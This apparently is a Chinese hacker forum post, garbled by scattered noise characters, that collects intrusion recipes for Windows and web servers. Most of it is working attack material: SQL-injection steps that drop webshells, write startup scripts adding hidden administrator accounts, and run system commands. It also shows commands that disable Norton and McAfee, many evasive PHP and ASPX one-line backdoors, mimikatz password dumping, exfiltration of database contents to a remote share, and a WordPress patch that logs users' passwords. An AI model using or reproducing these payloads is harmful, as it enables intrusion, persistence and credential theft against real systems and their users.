4 a' ^% R3 f; p1 @$ L; E& F9 W, |insert into a values ("set wshshell=createobject (""wscript.shell"") " );: u5 j0 Q3 p, o+ ~
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
+ s7 s! d' ~( d: n! {insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
9 ?9 c/ M" H- b5 Uselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
' L$ o' M+ t) `drop table a;
) t+ z! Z8 e* E0 I
* S: ]# z1 a! l, `8 e( z! k" `英文版本:( H' ?7 I9 x1 E( w, R
8 D1 _# L* H: J9 d: t% Y4 G8 q9 F* Iuse test;
) k6 Y5 u/ S) s' H ucreate table a (cmd text);0 a/ u. {$ u( z
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
. `& N: V! U2 ]insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );5 f A5 {; C; W4 F0 Q$ c
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );* J+ x3 F+ M5 F U# F; n
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
( y2 D. H& V6 Idrop table a;
% s1 B2 [$ e, K- w( z: l$ j) N% k; w, a
create table a (cmd BLOB);
- _) x+ q% f6 Uinsert into a values (CONVERT(木马的16进制代码,CHAR));/ I6 D' N. O; `+ f0 }. I
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'6 i' i8 ?0 m+ w7 B7 L
drop table a;# v' t& m3 u' b0 O
, G$ |+ V) ~$ _记录一下怎么处理变态诺顿
* Q9 L; `# i* A7 ]查看诺顿服务的路径) o; ?% [+ Y" c5 L' B) D; }
sc qc ccSetMgr; n! a. D# ^! m! G, @& E
然后设置权限拒绝访问。做绝一点。。
# @ e& |8 G. Scacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system7 K6 j' E) b7 h
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
& S: L; d( W2 m2 @ Kcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators- Y n3 }* n- i) f1 [, \
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone. c, Y! r" F3 ?. W
$ {) l6 b4 B% B5 {8 a, o然后再重启服务器( t! o1 u$ z5 e% Y) M2 P x* a
iisreset /reboot
; ~: ` V# L' d* |1 \9 @! p( |0 w: U这样就搞定了。。不过完事后。记得恢复权限。。。。
- |+ o1 O, f* Pcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F" c$ T' S. _# V' b: T! ^( k
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F0 K$ w y/ h7 J0 a
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
4 m" S9 W3 Q( O- f2 g Ccacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F+ J p1 h. j* _# b& A# O" z( I
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
! ?! p# a1 j8 {- q* F& L5 g: u n. Z4 j
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
: S0 q8 Z% f- c( o! s- o( J* }3 V3 n, W
postgresql注射的一些东西
: B/ o( K; l* i: X5 ~7 Y H如何获得webshell
4 i4 C2 I/ u+ N) Y' v' ^5 M- J3 P: Xhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); " a& p8 g; k! E
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); 9 E8 S$ }5 N* m: z+ T
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;, d9 d/ k! E8 w; ^ d$ C% I
如何读文件5 q: ~9 O: k) _5 U" {$ ?7 _
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);. a; ~: @, @0 ~8 j; l' E& p
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;# Q* E( D* l0 b4 p9 e4 i. h
http://127.0.0.1/postgresql.php?id=1;select * from myfile;( z* e& C+ `+ z8 ]0 X
1 `: u# l; B4 ^- r+ W1 A7 \z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。- _: @6 V, |. |/ t
当然,这些的postgresql的数据库版本必须大于8.X
9 E$ Q, [# Y3 H8 A" v1 A- m创建一个system的函数:5 `8 H$ L G, z! ~
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
+ Q5 k) D0 S3 c3 a( e" _+ G; f5 Q) p# f
创建一个输出表:- D i. O8 @8 l! h+ ]
CREATE TABLE stdout(id serial, system_out text)
! U8 m l5 ^( c% M5 b: W, D/ |& }) Q% c
执行shell,输出到输出表内:
1 f; Y" A9 H2 K" o! \SELECT system('uname -a > /tmp/test')
; [0 Z2 s9 z) l4 K& R* d- c. x" J. ^9 T; r* |* V' Z
copy 输出的内容到表里面;9 h, {: f- e- t G% Z
COPY stdout(system_out) FROM '/tmp/test'5 I- }/ Y$ k- e: @" B
/ \4 x& a* _$ d* ~. x: `, c从输出表内读取执行后的回显,判断是否执行成功8 Y# y' r2 h: e/ {! R o* {
5 K8 P5 @) ?( |* I3 e4 D* s- v% q
SELECT system_out FROM stdout
9 I2 _: m+ _8 V$ Q! {; P2 b; |下面是测试例子: K1 S7 N# c, R& j* S
2 ? W% L4 m; y' K* Q% S% `% i5 ?/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- * f" a- g& o/ F1 v
! R" t+ a" L% B6 s' ^+ d: |
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
( O$ A- J5 L9 B& v& ?# zSTRICT --. r4 d+ h) Z/ y8 W: _) `, c7 f
( C+ A$ T, n5 U2 `/store.php?id=1; SELECT system('uname -a > /tmp/test') --) C) a* d" _5 Y' d, V4 g( \- g
) D {, h2 m5 g2 `
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --* `. Z% [% B' C/ k) G4 j3 V
) R z. b& O: ], F; p, R" _ C/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--8 k4 X/ R$ g, q. p% Y3 v8 X
net stop sharedaccess stop the default firewall3 ~/ v M6 C3 p! w7 [: E7 e
netsh firewall show show/config default firewall* }4 m u8 e3 O3 |& o
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
" \: O+ o$ x# x) ynetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
H! n/ Q& I; t/ w; f# X$ [5 s7 }修改3389端口方法(修改后不易被扫出)) _0 R3 C; b7 S) ~
修改服务器端的端口设置,注册表有2个地方需要修改3 M3 W1 S \0 @0 K( R" e3 M
% G# X) E6 I# U: v+ p- W h+ K+ l
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
5 j, C" g7 ^6 l% W/ L) hPortNumber值,默认是3389,修改成所希望的端口,比如6000
- `: V9 {7 c3 j7 g
3 D& P5 M6 N& ]" Z第二个地方:
6 ]/ b. ?0 ]( s/ I[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 8 ~' K$ ?2 [8 s2 q/ H+ T5 P
PortNumber值,默认是3389,修改成所希望的端口,比如6000# }9 }# p) L; _& y* @
. r2 R; F y, C现在这样就可以了。重启系统就可以了* z q$ i. \2 @: N: c: l( A/ `& X# V
7 O: t. I( A; b+ p6 I+ b
查看3389远程登录的脚本
$ f* C: q `2 Q3 t7 c3 r1 ^4 Y8 O保存为一个bat文件$ r/ e0 N) K, L# u6 P$ v0 G
date /t >>D:\sec\TSlog\ts.log4 \: c4 X1 F% H
time /t >>D:\sec\TSlog\ts.log1 ^( f a4 J3 x1 O9 ~+ E+ c
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
, H# O: f7 V- p% v6 e7 E: Dstart Explorer/ u9 ^6 O: ?$ O+ e& ~1 _1 g T
. z+ W, t2 m9 j
mstsc的参数:
; a7 U, P m7 t3 O' ?. e# [1 H* A% V8 B- A9 d7 E
远程桌面连接
( m( x" m3 R8 U1 `+ Z' r/ Z& ~6 `5 w/ z0 M I
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]5 m/ ~! M9 Y" Y+ @( Z
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?& u0 L- Z6 D' S- i
' }+ h; g- Q1 N9 {
<Connection File> -- 指定连接的 .rdp 文件的名称。: ]4 }! [& k- w( _6 b7 C$ M% Q+ Z
" b' y! n0 l! j5 k/ d
/v:<server[:port]> -- 指定要连接到的终端服务器。
" X U( P$ E, V6 l7 B. p; `: B
0 r, t, P+ u5 l- k) G/console -- 连接到服务器的控制台会话。1 r# y( r" r1 K% o) d1 F
/ y7 b5 y; ]5 f' o9 e% g
/f -- 以全屏模式启动客户端。# a" r+ T2 p) f' e3 ?7 r2 d6 h' W$ L
$ b0 J* N& n* u7 ]9 w6 M
/w:<width> -- 指定远程桌面屏幕的宽度。! |) c/ J, O5 R2 U
: [" S" E. n. P8 ~; w. q
/h:<height> -- 指定远程桌面屏幕的高度。1 c" J+ ?4 ? ?2 `& o Y
8 v; h( P: S0 `+ c' l2 \$ N$ n/edit -- 打开指定的 .rdp 文件来编辑。* Q, I* x+ k; G7 s& k' E8 Y
) z1 ]5 D- ~: w5 s( c6 Z2 N# ]7 S; X1 ?
/migrate -- 将客户端连接管理器创建的旧版" X: o b; n+ O# g5 [+ v- O
连接文件迁移到新的 .rdp 连接文件。
; }6 N3 W5 ^3 [$ N4 O
6 X* r9 G' m2 J, T2 C
2 t+ |2 p1 [# |! f$ |( n+ { ?1 G1 B% F其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
7 {* x8 A# E* } umstsc /console /v:124.42.126.xxx 突破终端访问限制数量
8 A N- \' c9 j7 |( L" y) a2 N! m& S# y1 l
命令行下开启3389; c1 E7 L- L8 Q3 h
net user asp.net aspnet /add
- w! y# R7 b, tnet localgroup Administrators asp.net /add
1 g) Y9 M0 U1 ?net localgroup "Remote Desktop Users" asp.net /add
e- J1 F+ P2 _+ Zattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
, C- ] U; _) F! i# O7 Jecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
3 k6 e+ J4 q2 _% H$ l) [4 Pecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
/ W* g- J3 c9 S1 P+ vecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f1 b4 d$ ~3 t; L! E( y1 Y5 r
sc config rasman start= auto
9 n$ G4 a) V, i5 }, V2 wsc config remoteaccess start= auto
6 J. J! u, p1 J: jnet start rasman: [4 x- M% l6 z. b- B
net start remoteaccess! n% X. v; J, H$ ~
Media2 p: Y+ @# e$ {1 I7 f
<form id="frmUpload" enctype="multipart/form-data"6 |8 t" a9 z) j! E! q% W. Z: B
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
0 O- O: v2 ~, m% g<input type="file" name="NewFile" size="50"><br>
4 B; k. p! K9 J<input id="btnUpload" type="submit" value="Upload">4 C8 F% M( k! G# P
</form>
# a) t% M+ V5 @/ a/ v( ]
4 J/ ^2 `( P8 L. Y2 P1 {control userpasswords2 查看用户的密码
7 u5 H! o) e) j1 d; s' a1 e) U- ^access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径' g* a6 @8 ?9 |3 I
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
2 E- s2 m3 X O% p1 I0 i$ F6 f" ~2 p; I& l0 @, G
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
& s" J; y. T1 N0 @测试1:2 X* j5 p, d6 b9 p- g) L K
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
; w/ H2 B8 w% Y1 o% h% ]/ M# E# K2 W0 B% T% c: D- o
测试2:! H+ ^! c4 f5 W# A1 O
0 U. }, w, P8 p4 P4 J
create table dirs(paths varchar(100),paths1 varchar(100), id int)
* i& K( U# x8 d$ u7 m
$ o9 S" l1 L: o0 X" C5 P2 |9 L6 C. k1 pdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
- q3 X5 g8 N4 e8 X; a% i# E
9 r# x5 ?/ u+ u- y1 Z! w. a0 O8 jSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
' Y; o) ^2 p, V) k8 b3 A3 @ B5 R5 `关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令. c T4 S8 A' q, W# [! y# X# n5 f
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;+ Q, t7 f8 K0 N' j
net stop mcafeeframework5 v$ P1 y. t3 M0 \) q
net stop mcshield2 s0 ?$ ^4 z+ k
net stop mcafeeengineservice( {* k i2 j5 y# D
net stop mctaskmanager
8 o8 k6 E+ ^0 m$ g* w( f: N( F$ Phttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D- c9 x0 n4 Y3 D4 E
% O7 \1 Z* w/ d2 d' f) F, D VNCDump.zip (4.76 KB, 下载次数: 1) . ]8 X( u' _6 Z) E
密码在线破解http://tools88.com/safe/vnc.php
9 _9 W H0 z5 b5 LVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取1 a0 L: H5 j& U8 m* w$ E
( V, [6 }* B% B z& t' P$ `2 i: Gexec master..xp_cmdshell 'net user'6 v+ D5 s z2 }6 {3 S2 `9 X
mssql执行命令。
: a' U4 P1 |- S5 \6 G3 U' L获取mssql的密码hash查询
) J" a ]4 K- i, y' c bselect name,password from master.dbo.sysxlogins9 N3 O3 i# V9 P% N
5 X- Z: a; u: S4 y- D( Pbackup log dbName with NO_LOG;5 e2 ~2 \+ _' Y
backup log dbName with TRUNCATE_ONLY;% f+ h% F; e9 n. s+ P
DBCC SHRINKDATABASE(dbName);
! Y% I P# ?+ c# G# i6 q& emssql数据库压缩
% L7 g+ A8 L; p/ _0 [; D7 U5 T* h" i) ~: B) A+ R
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK$ F$ o! @5 E$ P' w
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。2 t5 i! Y; G: `* D6 y3 v B, Q
8 ^# u# e9 c$ L# j7 |8 z5 Obackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'6 j% Y+ G2 W( s' a9 x% l2 H
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
0 f7 s" k9 x; N1 k
: _' n8 p9 U5 j! l& R& l, |Discuz!nt35渗透要点:; Z# u! X U5 R4 Q9 j- P& V
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
. u$ P; y6 s0 p7 a q/ ~5 N(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>4 u# N j$ |1 }& l! I& A$ j# \
(3)保存。
; k9 d8 p' O! P2 X6 \% O$ k(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
0 R& c) r5 R+ c, `9 D5 Vd:\rar.exe a -r d:\1.rar d:\website\7 U! c! I \% k# \! s8 T+ h
递归压缩website6 X4 w" _) z5 H- q
注意rar.exe的路径
3 j i5 o2 J1 K; X6 p% o8 N/ ?" S
1 L7 U& u% X% `# J- k o. O<?php
+ |4 Z6 S2 @1 e9 s4 I3 z0 g1 z7 m1 P1 E& ~7 e ?( _
$telok = "0${@eval($_POST[xxoo])}";$ `6 O5 G( ?9 s" }5 |, \
/ i. \# i. ^) T+ w2 b$username = "123456";
& a' a% Q8 n. m x4 o% A& @, m, J1 f+ P% ?, |) F1 u# |& }2 C
$userpwd = "123456";4 v1 I3 I% m, c' b5 Q3 s7 \% ~$ J
# z- V$ l# y Y' g9 ~3 W( u$telhao = "123456";
, y5 c- z; H7 e! l) ?( J1 [2 w* C* Z4 E
$telinfo = "123456";
: k7 f! f) d A+ L( Z& o5 W' d% H0 V' d
?>
. M/ V2 c# v3 p, J( B9 P. h! Nphp一句话未过滤插入一句话木马! X: ~& m; D1 l3 `4 @& u/ R
0 ^$ g) n" O. k7 y1 f( S站库分离脱裤技巧) s' R8 [: x h
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
1 [# P" x( L- E1 m- N. Xexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
# v* W" d) x. d; u条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
/ n2 q+ ]* `) ^- T0 G" o- c3 r这儿利用的是马儿的专家模式(自己写代码)。5 a1 n/ o3 [( J
ini_set('display_errors', 1);
( e0 x) w/ }6 [; R" _8 }set_time_limit(0);4 x, P1 `+ b- r1 p% s9 d1 o
error_reporting(E_ALL);
, F# d. k! I1 i: B7 }! c$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
' v# X! o) }8 \0 Qmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
( P, d0 d& g" f/ U s$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());% i- p3 L. Y% b4 h+ d! n U
$i = 0;, U' i, j! C$ p" E5 g1 b
$tmp = '';- J: P) Y$ \% ~
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {3 \1 K& f8 d( B2 L4 i A- }
$i = $i+1;
7 E; Q( R" P' p1 T* I $tmp .= implode("::", $row)."\n";
3 [4 }- e" F/ c- ^- o if(!($i%500)){//500条写入一个文件
% `" x0 @+ G# L $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';- p2 V/ f' G$ g) `" O
file_put_contents($filename,$tmp);/ ]4 t) o, c/ D, h4 f7 d/ d6 Z7 I
$tmp = '';
8 U, N& n/ C& r5 d- i# M }
6 ?+ u% o; A6 j; P}
: v3 Z8 u& i! g' x$ z& F; d! Q9 tmysql_free_result($result);! {8 S9 J* U: O6 Z$ ] u6 w# i; v
4 Y% F2 |7 F4 n4 P7 d) l( V7 e
0 a! `: r+ J2 ^3 F/ A
; o9 K- ?# [: u# @: r//down完后delete& a2 s4 e: P2 c' h
7 |$ [+ a4 d( F( c8 u! K2 b7 v1 ], `: K+ U
ini_set('display_errors', 1);
2 [* _ @$ L/ C0 v9 kerror_reporting(E_ALL);
5 T& p7 V) p4 f! z$i = 0;
6 P+ A" m) ~- e, M2 |6 x1 swhile($i<32) {9 G B+ o h! N0 j7 x- i5 o% q9 I. E) @
$i = $i+1;# J: {$ A/ q5 u, }# W* S
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
+ P8 U$ m; ?7 X2 c [4 C2 h9 M, ] unlink($filename);2 j& m2 z$ a4 }: O% X
}
* M% ?7 ^% `& j/ Mhttprint 收集操作系统指纹. K4 ?6 w, a t! g; I
扫描192.168.1.100的所有端口
/ N C4 A1 F) ?3 c, f2 pnmap –PN –sT –sV –p0-65535 192.168.1.100
1 s$ K2 c/ D3 J5 h9 dhost -t ns www.owasp.org 识别的名称服务器,获取dns信息: M: {. O0 s' u+ N
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
6 J# \, }1 A% g; p) iNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
( n3 A/ g0 H3 W7 q; `7 m: x- J5 x( K1 G ]1 v; ^9 y
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)' D6 ?) {7 I2 I
0 T4 X) H1 k0 q/ ~ MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
( z& B" u" S* y2 C' H( K, C+ j2 H" L
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
8 A. I2 I. b7 ^7 C: R! \" z" v% p/ H$ q6 v+ W
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)& Y$ J/ l* T8 r! A' u
" V% B4 `9 f2 A5 i http://net-square.com/msnpawn/index.shtml (要求安装)
5 a" t; P: i2 P
0 X$ n: U0 J0 d' I- K tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
# ?- ^9 E& ~" n, ]* S2 I7 a0 j/ R, [. _
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
l3 n* C3 o+ k, B( ]set names gb2312
# x6 ?' J; l0 J( g+ W导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。4 l3 h r: g& W5 E+ W4 z$ D
* y: A+ m' _( e8 y2 V. @* ]( X7 _
mysql 密码修改& c5 M/ Q9 z+ S. A
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
7 S) J% p: e$ v; c; Tupdate user set password=PASSWORD('antian365.com') where user='root';' _9 Y6 o, x9 i7 S' D8 w
flush privileges;
6 L( M/ c | E O: P5 T; w高级的PHP一句话木马后门0 w3 x6 x9 ^9 O7 d0 `1 ^9 U* A5 ?
% ]1 U8 b% s: k
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
" N' Z3 c: r+ c# s' U/ w4 _2 ^* w; m, @- u/ }! W2 I8 H
1、# H& J( [3 Z+ S n
3 j6 @$ G% [: B7 W3 `' F$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
( d' I& {( O1 X9 h$ x: |
& n2 Y7 S! @, U6 B# p1 `$hh("/[discuz]/e",$_POST['h'],"Access");3 v) S( L7 D0 I9 ]1 b+ W
- b/ V+ A Y2 C6 [' k; w
//菜刀一句话2 n" t( P! s/ t
% V$ J6 v5 t- V5 @
2、
; E: a$ s' m9 I
. }4 x) b# ~- f) q4 B$filename=$_GET['xbid'];
$ m! H3 j" x3 _
% U8 L0 C0 [$ J3 }include ($filename);
+ c4 p3 u6 Z8 P! u1 M2 f+ R9 O/ r% U! t0 u& a/ j1 }
//危险的include函数,直接编译任何文件为php格式运行9 @6 _1 r* T. V: ~$ }4 G0 J
4 E f/ d* P1 ?9 S {) Q3、
6 A4 k: n& V( ?5 i# H1 R1 H7 X `1 Y4 f2 L- Q$ v5 ^# x
$reg="c"."o"."p"."y";
2 Y! ]$ f7 M! c7 U
3 \ H, k1 G, O6 g$ O$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);! q3 } c$ q" s- n
) a# P t- @0 W' A/ K$ P, J9 N* l
//重命名任何文件
/ n; ?4 D2 x; j: [& D; O9 u7 E8 ]
4、
$ E) K' c' o$ _ K+ z' H, n# z& @( t1 L4 X
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; a( r! s1 h$ }/ g2 k& x
$ W: a7 n1 F, x- H% t; |$ m L
$gzid("/[discuz]/e",$_POST['h'],"Access");
+ ?- j+ s6 I" O: M8 M7 \# U6 E$ \. e* Q" `5 p" W7 V
//菜刀一句话
; x( U; B( u6 i6 u( y c
- K. |) W# V- C7 M0 l" o7 x; e5、include ($uid);% x% p2 w" ]. r
* q. }. L# N) h4 n# F, M
//危险的include函数,直接编译任何文件为php格式运行,POST
8 _; s# X/ Z+ ?5 Z& I( T9 l- q4 P' w4 J" Z3 J$ n
+ ^5 a8 ^( Z F& a. J
//gif插一句话6 v i2 ?6 s7 N1 O& X+ n( G0 R# i
, D0 {* q% m1 \7 s6、典型一句话. Z* Z1 o: M1 q: R. s
4 {3 d" O9 a3 M D: |' S0 ]程序后门代码
" {# M; Q& ~. h" p. P0 |9 A% _<?php eval_r($_POST[sb])?>" b8 @! `7 a1 Z! O" N
程序代码9 O) e$ P! K! S
<?php @eval_r($_POST[sb])?>0 I/ F5 E$ Y/ E/ {, j9 m$ E
//容错代码
. w2 `; U2 P; I1 H/ v t9 U程序代码( p! G( f4 c" N D' R1 O6 A4 n) ~8 q
<?php assert($_POST[sb]);?>8 a$ {: f2 ?1 p' n. B
//使用lanker一句话客户端的专家模式执行相关的php语句
w+ T9 w$ v" Z* a1 i4 G$ ]程序代码
; R( j" H, e+ H<?$_POST['sa']($_POST['sb']);?>
2 `0 [! d( Q5 u" A程序代码! \0 t8 J$ V9 S1 W* ~/ Y# U$ T4 Z R6 p
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
& y0 i: \0 n1 X+ b; `0 ]程序代码
& }' }% m! \4 [; z* b q% o<?php
7 v9 a7 l; ~. |( x* K0 f: U* c1 E@preg_replace("/[email]/e",$_POST['h'],"error");8 R h% e2 ]9 g9 }3 O3 l0 x
?>* a( y7 o: s; R, u8 Z \
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入4 M0 [7 k: e( G. j. w
程序代码
* @$ d. O# @4 z) U5 m* n# X<O>h=@eval_r($_POST[c]);</O>6 V6 }0 L% w+ J+ Y; e( |* `
程序代码
# W0 u7 N) P0 g2 q1 B/ g<script language="php">@eval_r($_POST[sb])</script>2 r7 i4 {" y: \7 k
//绕过<?限制的一句话, H+ V; b$ c, b" A
* E2 h/ X4 O- |! F; R4 L9 @! rhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip) {8 a+ N P |3 J: V
详细用法:* }; o3 E* y$ u
1、到tools目录。psexec \\127.0.0.1 cmd/ _3 ]: [1 O) j5 ]* I
2、执行mimikatz% L+ o" W) @4 }' j G+ T. V& q
3、执行 privilege::debug
2 g h% l) Y0 T7 ~( A4 K4、执行 inject::process lsass.exe sekurlsa.dll
* R( d3 S4 a" C( `- v- @$ I5、执行@getLogonPasswords/ L8 q- J8 k% D% u6 @* J4 m
6、widget就是密码
( t) s$ k) ]: c: s& j7、exit退出,不要直接关闭否则系统会崩溃。
$ N6 Y4 {* w0 z+ l) W4 m+ B9 Y1 V8 Z6 ]3 B. b3 l
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
2 ?5 c5 r, @6 V9 @
/ D1 s* J" i: Z" \; [9 K, T自动查找系统高危补丁
4 i, T' `: d3 Rsysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt9 U( v/ ~& y8 a& V; V9 k2 B! y
$ Q' o% F4 c2 d" _6 O突破安全狗的一句话aspx后门
( q2 @- T9 H& C @& t% x<%@ Page Language="C#" ValidateRequest="false" %>3 S7 R) d3 [0 l# R3 l1 z9 r
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>- m% Q8 ^0 v! \
webshell下记录WordPress登陆密码9 F8 ^5 t# C6 H" b2 S5 t) K
webshell下记录Wordpress登陆密码方便进一步社工3 q; X' O: a6 j! l% m
在文件wp-login.php中539行处添加:
9 ? y* v8 L; p- t: c: v1 t) U/ R# ^// log password
% c: S( n2 P9 ~' t1 N$log_user=$_POST['log'];
) G4 r/ ~5 D% x) r6 C" E( q$log_pwd=$_POST['pwd'];/ }$ m3 }6 a3 g3 w
$log_ip=$_SERVER["REMOTE_ADDR"];0 \; U1 _ k9 ]" ^# Y8 M
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
|! H5 I" j0 i: |$txt=$txt.”\r\n”;) | W8 \0 m6 W* ?# N% L
if($log_user&&$log_pwd&&$log_ip){
0 {; F1 j( F- o7 _@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
$ g3 o. m4 h- W& H; z}
( v& b, n, h9 v当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。* D* m- q" n9 U( k4 ~
就是搜索case ‘login’
0 c% H, X* Z5 Y5 z) M在它下面直接插入即可,记录的密码生成在pwd.txt中,
2 I1 c' E; L% C- B4 |. b其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
+ n0 n, \& D+ U. Z7 f5 M- ^! |6 a, C7 c利用II6文件解析漏洞绕过安全狗代码:
& C& X; }" h; h2 s5 @- t;antian365.asp;antian365.jpg
1 `& o' g. ? {. R9 b" }! p' h
